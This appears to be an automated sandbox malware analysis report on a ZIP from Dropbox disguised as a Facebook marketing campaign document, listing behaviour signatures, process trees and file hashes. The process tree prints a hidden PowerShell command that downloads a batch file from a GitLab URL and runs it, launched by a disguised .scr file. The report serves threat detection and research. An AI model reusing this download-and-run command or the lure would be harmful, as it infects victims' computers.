Analysis
-
max time kernel
1800s -
max time network
1690s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2023 10:35
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.dropbox.com/scl/fi/r3firsxixp8h4qv69gurt/A.Objectives-of-Facebook-Marketing-AD-Campaign-2023-NEW-Obag-Handbags.zip?rlkey=7hrjxunzlesjpku1m2t8qg8gq&dl=1
Resource
win10v2004-20230703-en
General
-
Target
https://www.dropbox.com/scl/fi/r3firsxixp8h4qv69gurt/A.Objectives-of-Facebook-Marketing-AD-Campaign-2023-NEW-Obag-Handbags.zip?rlkey=7hrjxunzlesjpku1m2t8qg8gq&dl=1
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 59 2300 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1272 A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.scr -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133369149935295412" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings chrome.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3508 chrome.exe 3508 chrome.exe 4012 chrome.exe 4012 chrome.exe 2300 powershell.exe 2300 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3508 chrome.exe 3508 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeRestorePrivilege 500 7zG.exe Token: 35 500 7zG.exe Token: SeSecurityPrivilege 500 7zG.exe Token: SeSecurityPrivilege 500 7zG.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe Token: SeShutdownPrivilege 3508 chrome.exe Token: SeCreatePagefilePrivilege 3508 chrome.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 500 7zG.exe 500 7zG.exe 1272 A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.scr -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe 3508 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3508 wrote to memory of 1820 3508 chrome.exe 82 PID 3508 wrote to memory of 1820 3508 chrome.exe 82 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 3796 3508 chrome.exe 85 PID 3508 wrote to memory of 2436 3508 chrome.exe 87 PID 3508 wrote to memory of 2436 3508 chrome.exe 87 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86 PID 3508 wrote to memory of 1672 3508 chrome.exe 86
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.dropbox.com/scl/fi/r3firsxixp8h4qv69gurt/A.Objectives-of-Facebook-Marketing-AD-Campaign-2023-NEW-Obag-Handbags.zip?rlkey=7hrjxunzlesjpku1m2t8qg8gq&dl=11⤵
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff847a69758,0x7ff847a69768,0x7ff847a697782⤵PID:1820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:22⤵PID:3796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:82⤵PID:1672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:82⤵PID:2436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2972 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:12⤵PID:4064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2964 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:12⤵PID:2192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:82⤵PID:440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:82⤵PID:4476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:82⤵PID:3268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3788 --field-trial-handle=1828,i,7610650676955910666,4909468630279808265,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4012
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4216
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4612
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\" -spe -an -ai#7zMap25839:204:7zEvent275171⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:500
-
C:\Users\Admin\Downloads\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\1.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.scr"C:\Users\Admin\Downloads\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\1.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.scr" /S1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\pub.bat""2⤵PID:3656
-
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -Uri https://gitlab.com/ffhfghgh03/03pro03/-/raw/main/bat1208DI1 -OutFile 'C:\Users\Public\publicc.bat'; Start-Process -WindowStyle Hidden -FilePath 'C:\Users\Public\publicc.bat'3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1009B
MD5697c7baafa2da4fde146172c1d6f6edf
SHA1a357abac8d24fe76546060415d432265df382ee7
SHA256a7fa801299a98a638868b5239daf1b2f276cb60eb8a1533816fd598441726499
SHA512d58d76421e6bff1afce791053de27841d71f8567b53303c272939645d7b292fec9589a08b9071220bdc02c22595751a65e1e947bcc7ae7e18e1fa13c9bb3aab1
-
Filesize
1KB
MD5a60f0db3f815a3c582fc1280dddae680
SHA16a79a8507c3d1d4b8c94cab7a6ca79e31346ad84
SHA256c3218315f4236a51c8b01e7c507f6296c5092a09df0247fef14b8875e1d9be5d
SHA512b917e7af12efca420c69b0f3cd6ef01146f529605042941e2924176d8fd1b11585c896eeb4400289b643a9a2358387c062934c9e808b0fde137438bd4a42c618
-
Filesize
705B
MD535611e8e82a080a85d9db266616b1d7b
SHA165089141bdf54b914592bbdb8de70bb896c130ef
SHA2560dc41e959fcab67745a15033b53119fcb89a798615fd843d8ddcebf390145c55
SHA512f11af7f23a06e325427f9bcfc8562b37265047acb27b7ce8e4d74ab32bacb90f76783bdf7a963b0dc2b5701cabf558422b78a17e439be9cb978cc714df160c58
-
Filesize
6KB
MD53b4cfaa00ea6e0a0d498c6e2f6be70b1
SHA162519a9815dce5a751e5312ab54afb025a5fabd3
SHA256c01efdd68f577bcb668c62dd53460127422e6a7203797f3d6f7a8859039c4f41
SHA5121ed5e2156450b526aeb01b56ed0217ac6fc55855e972992fa5133799671dc45d5bd633f18ca695c5c1c4798de52132f8329703636a5f619821f9a061c3dbccf1
-
Filesize
6KB
MD5ce28622acba9c9a526b157d0901317b6
SHA15f8eb3bf1871726cc53f27db147e90a78f419d3e
SHA25687aa2276a761c735563dd39b2863e99e1d8f8a0fa5ef1925e19de661641786fd
SHA5124e2b30463186a701901da903d4c4eb1c381ebea7f65fde4336c01190a4226f6c141314ad4b04761d3e04ed392a441e99df06bd30e2f0a41dd48ff818b1091b3e
-
Filesize
87KB
MD55acd1a43e4e2a2544b3fbb9effaccb5d
SHA11e51a535fb4e1a577fbd68a5ab904f83273e4349
SHA2568d8f1f3ef333406d20b3a83cbe27f77a4d0c3334b22ffd7c6c3ad0eca3b7703d
SHA51270f33554857bfb71eb006bdbe28ffe6e309a43a44ad3850a2a812826381ddebcfb73e389b0b7981b53c0fe38f0cc48d39c668e6d3b3e10d0da20e88bbb11eb16
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\Downloads\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.zip
Filesize76.4MB
MD56124da1256773a5a31acfafc6987331f
SHA11b05d4ede09cd6ce552baad5d58cec445f5d482a
SHA2560f335a31f59f034bed6ab913aecfcbcd149ce69845e3793aa35700092a027dcc
SHA5127473f5bd40b092d129f281503797b1e42ed314d5f06d532bfe84d738b7301fa76fd551ad039a07c183b717e58a9f098d81fcdf36dbcda505cf1a087151fc0252
-
C:\Users\Admin\Downloads\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\1.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.scr
Filesize803.2MB
MD5f8ab8c5d058cc918a5fdfb984e51fca1
SHA1e47b6d707b14fe93521e5c0dc9ad5b5a7be248f8
SHA256403bf3af25ef91e837e818ff6ecba86b4c87c11eb50965af16e08e3c25a1bbea
SHA5127b385634464826a404d655cb4b108dcba7ae1dbb44cfd4a01c4471911e3d4ccd4d835a552d9aa236a7737de1ac780baed9a84b803964b63e4fa371881ffeec97
-
C:\Users\Admin\Downloads\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\1.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags\A.Objectives of Facebook Marketing AD Campaign 2023 NEW - Obag Handbags.scr
Filesize803.2MB
MD5f8ab8c5d058cc918a5fdfb984e51fca1
SHA1e47b6d707b14fe93521e5c0dc9ad5b5a7be248f8
SHA256403bf3af25ef91e837e818ff6ecba86b4c87c11eb50965af16e08e3c25a1bbea
SHA5127b385634464826a404d655cb4b108dcba7ae1dbb44cfd4a01c4471911e3d4ccd4d835a552d9aa236a7737de1ac780baed9a84b803964b63e4fa371881ffeec97
-
Filesize
1KB
MD5f007465de3ec71daa17340a7e59d6409
SHA16f36d8f55dafc9798656065bc2ae39b5f2b73f3e
SHA2567089a458b3a608be4ff201be98edab1031d9c1e2ed80e93152752df14453be24
SHA51240b6d136acf7e09753e08deedbaf997f1f86eb1e9b803031d9cc883f960ea74d2e67b395185244a92546f48edfea9d96d6427ece74c530ca87fab629f1aa1e7e